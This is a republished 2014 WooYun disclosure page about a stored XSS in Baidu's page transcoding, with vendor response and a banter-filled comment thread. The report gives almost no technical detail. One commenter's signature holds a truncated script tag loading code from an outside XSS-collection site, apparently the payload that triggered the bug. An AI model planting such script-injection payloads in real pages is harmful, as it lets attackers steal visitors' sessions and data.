百度转码不当导致储存xss

admin 2015年7月25日16:03:04评论286 views字数 209阅读0分41秒阅读模式
摘要

2014-10-31: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向核心白帽子及相关领域专家公开
2014-11-20: 细节向普通白帽子公开
2014-11-30: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

漏洞概要 关注数(16) 关注此漏洞

缺陷编号: WooYun-2014-81441

漏洞标题: 百度转码不当导致储存xss

相关厂商: 百度

漏洞作者: M4sk

提交时间: 2014-10-31 08:39

公开时间: 2014-12-15 08:40

漏洞类型: XSS 跨站脚本攻击

危害等级: 中

自评Rank: 6

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 持久型xss 存储型xss XSS

0人收藏


漏洞详情

披露状态:

2014-10-31: 细节已通知厂商并且等待厂商处理中
2014-10-31: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向核心白帽子及相关领域专家公开
2014-11-20: 细节向普通白帽子公开
2014-11-30: 细节向实习白帽子公开
2014-12-15: 细节向公众公开

简要描述:

么么哒

详细说明:

百度转码不当导致储存xss

手机提交的不好说明,直接百度搜我,然后点击进入乌云个人主页,转码不当页面触发xss

漏洞证明:

综上

修复方案:

过滤

版权声明:转载请注明来源 M4sk@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-10-31 14:52

厂商回复:

该问题已经知晓,详情参考1L回复内容

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-10-31 08:54 | 碎片 ( 路人 | Rank:26 漏洞数:11 | <script src=http://www.xss8.net/?c=MjMf4...)

    2

    我想说的是,我已经提交百度了

  2. 2014-10-31 08:54 | 泳少 ( 普通白帽子 | Rank:257 漏洞数:84 | ★ 梦想这条路踏上了,跪着也要...)

    0

    碎片的乌云ID。。然后空间有人发截图。。接着。。。呵呵一句。。王尼玛笑了。。m4sk带上泳少过来了

  3. 2014-10-31 10:35 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    m4小儿

  4. 2014-10-31 10:44 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

    0

    ?我会说是我自己发现的么?

  5. 2014-10-31 10:46 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

    0

    @老和尚 不懂你们什么思想,你们知道你们怎么不提交,然后别人发现了提交了就呵呵了?你们最牛比,我只是一个菜鸟,

  6. 2014-10-31 10:57 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @m4sk 吾儿,我信你啊.... 我是inso,你大爷

  7. 2014-10-31 11:14 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

    0

    @老和尚 黑客,我已经关注你很久了,快来我这做胯下吹箫童子岂不美哉

  8. 2014-10-31 11:18 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @M4sk 施主,你再闹,我就用降龙罗汉掌打你pp了

  9. 2014-10-31 12:05 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

    0

    @老和尚 papapappapap

  10. 2014-10-31 12:13 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    你敢打你linso大爷...

  11. 2014-10-31 12:13 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    总有一天,我会骑着雨牛@'

  12. 2014-10-31 12:24 | 光刃 ( 普通白帽子 | Rank:200 漏洞数:25 | 萝卜白菜保平安)

    0

    @老和尚

  13. 2014-10-31 12:27 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @光刃 干啥 @m4sk 楼上不是我本人...

  14. 2014-10-31 12:28 | 光刃 ( 普通白帽子 | Rank:200 漏洞数:25 | 萝卜白菜保平安)

    0

    @老和尚 听不懂你在说什么。

  15. 2014-10-31 12:31 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @光刃 jb、

  16. 2014-10-31 16:37 | 北京方便面 百度转码不当导致储存xss ( 核心白帽子 | Rank:1117 漏洞数:81 | 我爱吃北京方便面)

    0

    @老和尚 我只是个小马甲而已 T_T

  17. 2014-10-31 17:21 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    哈哈。1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin